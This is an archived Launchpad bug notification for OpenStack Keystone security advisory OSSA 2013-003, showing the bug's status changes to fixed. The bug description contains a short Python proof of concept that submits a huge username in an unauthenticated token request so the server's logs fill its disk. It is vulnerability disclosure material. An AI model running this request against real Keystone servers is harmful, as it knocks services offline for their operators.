← Back to team overview

yahoo-eng-team team mailing list archive

[Bug 1098307] Re: [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

 

** Summary changed:

- unauthenticated POST to /tokens can fill up disk/logs
+ [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Thierry Carrez (ttx)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1098307

Title:
  [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  A remote unauthenticated keystone user could potentially fill up the
  disk on a Keystone server by running the following python script:

  -----------------------
  from keystoneclient.v2_0 import client

  PASSWORD='foobar'
  TENANT='blah'
  USER = '00000' * 9999999

  keystone = client.Client(username=USER,
                           password=PASSWORD,
                           tenant_name=TENANT,
                           auth_url='http://localhost:5000/v2.0')

  -----------

  Running this script will increase the log file size by 100 MB per
  request. NOTE: This happens when running keystone at the default log
  levels:

  # verbose = False
  # debug = False

  
  Version-Release number of selected component (if applicable):

  openstack-keystone-2012.2.1-1.el6ost.noarch (Red Hat)

  How reproducible:

  *always*

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1098307/+subscriptions